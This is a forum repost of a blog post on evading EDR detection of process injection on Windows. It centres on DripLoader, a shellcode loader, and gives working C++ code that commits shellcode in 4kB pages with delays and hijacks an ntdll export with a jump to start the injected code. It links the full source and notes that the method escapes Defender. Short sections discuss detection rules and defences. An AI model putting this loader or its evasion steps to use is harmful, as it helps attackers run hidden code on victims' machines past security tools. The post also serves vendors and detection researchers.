Nytro Posted May 11, 2021 Report Posted May 11, 2021 Bypassing EDR real-time injection detection logic This is not really about suppressing/bypassing event collection, and more on understanding EDR architecture design flaws, lazy detection logic and correlation to minimize chance of triggering alerts with events that are (at least partially) collected. Some great posts on bypassing EDR agent collection: Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR (outflank) A tale of EDR bypass methods (@s3cur3th1ssh1t) FireWalker: A New Approach to Generically Bypass User-Space EDR Hooking (mdsec) Hell's Gate (@smelly__vx, @am0nsec) Halo's Gate - twin sister of Hell's Gate (sektor7) Another method of bypassing ETW and Process Injection via ETW registration (@modexpblog) Data Only Attack: Neutralizing EtwTi Provider (@slaeryan, kernel mode) Introduction In the previous post we discussed how solutions which use reliable, kernel-based sources for remote memory allocation events can use these to identify many of the in-the-wild injections with relative ease, regardless of the specific technique used, and without worrying that the event source is trivial to bypass from the usermode. Most notably Microsoft uses that ETW, though there are vendors who do it better. Today I wanted to share how easy it is to bypass any memory allocation-based logic. We will also bypass thread initialization alerting, which combined give us a technique undetectable by MDATP and many other EDRs out there, as of today. It is important to expose detection gaps like this, not only to force security vendors to improve defenses, but primarily to build awareness around inherent limitations of these solutions and the need for in-house security R&D programs, or at least use of well-engineered managed detection services for more complete coverage. Check out my previous post on detecting process injection with kernel ETW. T1055 vs EDR Let's first take a look at what independent evaluations can tell us about process injections, and if there is even anything to bypass. It's definitely good to know the product you're using is not able to flag Meterpreter's migrate command and process hollowing procedures from a 5+ year old Carbanak malware available on GitHub, even with prior knowledge of what is going to be tested, and half a year to prepare if needed. Other than that value of the last evaluation in context of injections is very limited, and we are not getting the full picture of how much each vendor invests into researching TTPs relevant right now, and in the future, or how robust the detection capability and data sources really are. https://ela.st/mitre-round3 While some EDRs were not able to flag on the elementary techniques, many improved detection capability to the point that today, it is not uncommon for process injection to be considered OPSEC-expensive by red teams. Experienced operators tend to tailor detection bypasses per-solution, and in some environments they choose to avoid injecting altogether, as the very limited set of APIs Windows exposes for memory and thread management are under close surveillance. We are going to talk about bypassing the mature solutions today - for the ones with T1055 misses here just use APC injection and you'll probably be fine. Let's first discuss all the detection opportunities for anomalous remote thread creation. CRT anomalies The API getting most attention has to be kernel32!CreateRemoteThread, but we are really talking about ntdll!NtCreateThreadEx, or the kernel mode target intercepted through kernel callbacks. https://github.com/elastic/detection-rules Here we have a basic detection for a specific Windows process - msbuild.exe creating a new thread in a remote process. Even though criticality of a potential true positive would be quite high, after testing the rule author decided it is only suitable for low severity (probably due to FP-rate), which likely degrades the rule to an IR label/enrichment in most environments. Such a simple detection rule is unlikely to be part of a mature EDR solution where customers expect to receive alerts for activities like this with high severity, while keeping noise down to allow their analysts to review and classify the important stuff. https://github.com/FalconForceTeam/FalconFriday A more generic, custom MDATP thread creation rule based around the new FileProfile() enrichment function - detects extremely rare files creating threads in remote processes. Very useful to implement in-house, but still unlikely to be found in EDRs in such a simple form, as it would cause substantial amounts of false positives in certain environments, and could prove difficult to maintain. As an example, Defender logs most remote thread creations as labeled events, but low file prevalence is not good enough of an indicator to trigger alert, and there is more advanced logic in play - true for most decent EDRs. CRT events logged by Defender Understanding correlation By "detections" and "alerts" I do not just mean labeled activity which can be found somewhere in the platform, but rather independent pieces of logic able to signal threats with high enough fidelity to generate user-facing security incidents with no additional activity tagged on the endpoint. (I also assume the platform is not incredibly noisy, to the level of it being unusable) This is important to remember as EDRs use various kinds of correlation to link otherwise undetected activities to existing incidents initiated by high fidelity alerts, or generate them based on some risk score analysis often affectionately called "AI", making it difficult to judge whether some particular TTP would be detected in isolation. Some types of correlation can be very complex and difficult for adversaries to guess, but due to the high costs associated with preserving active context and using it in detection, time-based correlation plays a role in most. On-agent detections, activity and software inventories are often not implemented or limited in scope due to reverse engineering concerns or architecting difficulties. We will exploit this fact later on when building our shellcode injector by introducing delays in execution as one way to avoid detection. The concept is not new and is commonly used in network attacks where IDS solutions tend to detect based on thresholds. For the same reason choosing your EDR vendor based on the numerical results of things like the Mitre evaluation and percentage of coverage - is not a good idea. Among other issues, the test rounds are executed in an unrealistically short time window of around 30 minutes for the whole attack kill chain, which means time correlation of labeled events from the host to a single alert is good enough to score 100% coverage. High fidelity alerts So we know that even though the number of functions to monitor is limited, the volume of legitimate events poses significant challenges for high fidelity detection, and forces defenders to narrow down what constitutes "suspicious", resulting in heavy filtering or log&ignore of many collected events. For thread creation the most common constraint is thread starting process ≠ hosting process - so monitoring only remote thread creation, usually also limited to those with: thread start in image "unbacked" MEM_COMMIT-type segment the size of segment being larger than X and on scale this will still generate very significant amount of false positives, which may lead to further filtering, for example: thread location (target) only in Windows built-in executables only a subset of these thread initiator (source) only in risky executables unknown hashes low file prevalence risky paths (%userprofile%, %temp% etc.) not seen on the network/on the host memory page contains suspicious stuff Machine learning models are often employed to attempt solving this issue, and so on - these assumptions will differ for vendors, but the idea is to tame thread creation. The less mature solutions in fact often rely on thread creation hooking/callbacks as the only source of data for injection detection. While it is true that for majority of injection techniques a new thread will be created in the target process at some point, the way in which it's created is often unexpected and makes monitoring infeasible, thus relying exclusively on ntdll!NtCreateThread(Ex) hooking/thread creation callbacks nowadays is an easily exploitable design flaw. SetThreadContext In case of process hollowing or thread hijacking our target thread has already been created legitimately by the Windows Loader or the target application locally, and thus there is nothing to detect upon. This is one of the reasons CobaltStrike execute-assembly uses SetThreadContext instead of CRT injection on the sacrificial process. Once we have the telemetry, on scale it's much easier to detect certain SetThreadContext anomalies, than CRT-injection, and today in many environments it generates high criticality alerts, rendering fork&run useless in stealthy offensive ops. QueueUserAPC Asynchronous Procedure Calls provide another avenue for avoiding thread creation. An APC can be queued for an existing thread, and executed once it enters an alertable state. In recent years userland hooking evasion is getting a lot of coverage, and Early Bird injection has popularized use of APCs for that purpose. The idea is to queue an APC in a newly spawned, suspended process, before the ntdll!LdrpInitializeProcess function had a chance to run. That way our scheduled routine is executed before the hooking DLLs are loaded into the target process. Once again this technique becomes easy to detect when we stop relying solely on hooking. DripLoader DripLoader is an evasive shellcode loader (injector) for bypassing event-based injection detection, without necessarily suppressing event collection. The project is aiming to highlight limitations of event-driven injection identification, and show the need for more advanced memory scanning and smarter local agent inventories in EDR. DripLoader evades EDRs by using the most risky APIs possible like NtAllocateVirtualMemory and NtCreateThreadEx blending in with call arguments to create events that vendors are forced to drop or log&ignore due to volume avoiding multi-event correlation by introducing delays Allocating memory To bypass any memory allocation based logic we will only commit page granularity, or PageSizesized pages, which on Windows 10 with a modern processor is 4kB: this constant found in SYSTEM_INFO structure tells us the lowest possible size of a VM allocation since most legitimate remote VM operations work on a single, or a few bytes, 4kB is by far the most prevalent allocation size (>95%), making it extremely challenging to detect on To accomplish this we need to deal with some inconveniences we need our shellcode in memory as a continuous byte sequence which means we cannot let kernel32!VirtualAllocEx choose base, as it might reserve memory at an address where the other allocations will not fit in Windows, any new VM allocation made with kernel32!VirtualAllocEx and similar is rounded up to AllocationGranularity which is another constant found in SYSTEM_INFO and is usually 64kB for example, if we allocate 4kB of MEM_COMMIT | MEM_RESERVE memory at 0x40000000, the whole 0x40010000 (64kB) region will be unavailable for new allocations Steps we take pre-define a list of 64 bit base addresses and VirtualQueryEx the target process to find the first region able to fit our shellcode blob const std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000, (void*)0x0000000010000000, (void*)0x0000000021000000, (void*)0x0000000032000000, (void*)0x0000000043000000, (void*)0x0000000050000000, (void*)0x0000000041000000, (void*)0x0000000042000000, (void*)0x0000000040000000, (void*)0x0000000022000000 }; LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv) { MEMORY_BASIC_INFORMATION mbi; for (auto base : VC_PREF_BASES) { VirtualQueryEx( hProc, base, &mbi, sizeof(MEMORY_BASIC_INFORMATION) ); if (MEM_FREE == mbi.State) { uint64_t i; for (i = 0; i < cVmResv; ++i) { LPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran)); VirtualQueryEx( hProc, currentBase, &mbi, sizeof(MEMORY_BASIC_INFORMATION) ); if (MEM_FREE != mbi.State) break; } if (i == cVmResv) { // found suitable base return base; } } } return nullptr; } reserve required number of full AllocationGranularity (64kB) sized regions, and then loop over those commiting 4kB pages to ensure page alignment // MEM_RESERVE, NO_ACCESS, 64kB for (i = 1; i <= cVmResv; ++i) { // sleeps here ANtAVM( hProc, ¤tVmBase, NULL, &szVmResv, MEM_RESERVE, PAGE_NOACCESS ); if (STATUS_SUCCESS == status) vcVmResv.push_back(currentVmBase); else return 4; currentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv); } // MEM_COMMIT, PAGE_READWRITE -> PAGE_EXECUTE_READ, 4kB for (i = 0; i < cVmResv; ++i) { for (cmm_i = 0; cmm_i < cVmCmm; ++cmm_i) { DWORD offset = (cmm_i * szVmCmm); currentVmBase = (LPVOID)((DWORD_PTR)vcVmResv[i] + offset); ANtAVM( hProc, ¤tVmBase, NULL, &szVmCmm, MEM_COMMIT, PAGE_READWRITE ); // sleeps here SIZE_T szWritten{ 0 }; ANtWVM( hProc, currentVmBase, &shellcode[offsetSc], szVmCmm, &szWritten ); offsetSc += szVmCmm; // sleeps here ANtPVM( hProc, ¤tVmBase, &szVmCmm, PAGE_EXECUTE_READ, &oldProt ); } } The pages are also written to and individually reprotected with each run to avoid large RegionSize of target memory page in properties of logged VirtualProtectEx events. (TiEtw provides this, and hooks can too). Creating the thread Now that we have our shellcode in the remote process we need to initiate it's execution. To do this we will use the CreateThreadEx native API which is the ntdll target of CRT, and hence very commonly called by legitimate software. To bypass any detections we will: create the new thread from MEM_IMAGE base address moreover, we use a known-good module loaded by the Windows Loader, ntdll.dll the location will be patched with a far jmp to our shellcode base at the time of thread creation Note that we do not need to run in a MEM_IMAGE segment, as we only care about logging of arguments in the TiEtw/Hook event. If our shellcode creates a new thread (which would happen for example when using sRDI beacon.dll), the locally created thread won't be tagged on by most EDRs, but it will no longer have ntdll as it's start address which could get it detected by basic Endpoint Protection, and will get it detected by Get-InjectedThread. Steps we take figure out RVA of the function we will hijack // ntdll.dll char jmpModName[]{ 'n','t','d','l','l','.','d','l','l','\0' }; // RtlpWow64CtxFromAmd64 char jmpFuncName[]{ 'R','t','l','p','W','o','w','6','4','C','t','x','F','r','o','m','A','m','d','6','4','\0' }; LPVOID PrepEntry(HANDLE hProc, LPVOID vm_base) { unsigned char* b = (unsigned char*)&vm_base; unsigned char jmpSc[7]{ 0xB8, b[0], b[1], b[2], b[3], 0xFF, 0xE0 }; // find the export EP offset HMODULE hJmpMod = LoadLibraryExA( jmpModName, NULL, DONT_RESOLVE_DLL_REFERENCES ); if (!hJmpMod) return nullptr; LPVOID lpDllExport = GetProcAddress(hJmpMod, jmpFuncName); DWORD offsetJmpFunc = (DWORD)lpDllExport - (DWORD)hJmpMod; [...] } find base of remote ntdll and calculate AVA [...] LPVOID lpRemFuncEP{ 0 }; HMODULE hMods[1024]; DWORD cbNeeded; char szModName[MAX_PATH]; if (EnumProcessModules(hProc, hMods, sizeof(hMods), &cbNeeded)) { int i; for (i = 0; i < (cbNeeded / sizeof(HMODULE)); i++) { if (GetModuleFileNameExA(hProc, hMods[i], szModName, sizeof(szModName) / sizeof(char))) { if (strcmp(PathFindFileNameA(szModName), jmpModName)==0) { lpRemFuncEP = hMods[i]; break; } } } } lpRemFuncEP = (LPVOID)((DWORD_PTR)lpRemFuncEP + offsetJmpFunc); [...] overwrite the function prologue with a jmp [...] if (NULL == lpRemFuncEP) return nullptr; SIZE_T szWritten{ 0 }; WriteProcessMemory( hProc, lpDllExport, jmpSc, sizeof(jmpSc), &szWritten ); return lpDllExport; } CreateRemoteThread The full source and more explanations can be found on GitHub xinbailu/DripLoader Evasive shellcode loader for bypassing event-based injection detection (PoC) - xinbailu/DripLoader github.com Result 1. The activity will generate events with the following characteristics // reservations VM_ALLOC: REMOTE: 1, SIZE: 0x10000, TYPE: 0x2000, PROT: 0x01 (-) // commits VM_ALLOC: REMOTE: 1, SIZE: 0x1000, TYPE: 0x1000, PROT: 0x04 (rw) VM_WRITE: REMOTE: 1, SIZE: 0x1000 THREAD_START: REMOTE: 1, SUSPENDED: 0, ACCMSK: 0xFFFF (full), PAGE_TYPE: 0x1000000 (img), LPTHREAD_START_ROUTINE: ntdll.RtlpWow64CtxFromAmd64+0x0 2. State of the target process (assuming shellcode does not create thread) Defense recommendations Option #1: Monitor injection APIs yourself EDRs with custom rule creation (or hunting) capabilities can be used, but make sure to fully understand under what circumstances events are collected aggregations and least frequency analysis hunting queries can be used to reduce workloads for your team Sursa: https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection 1 Quote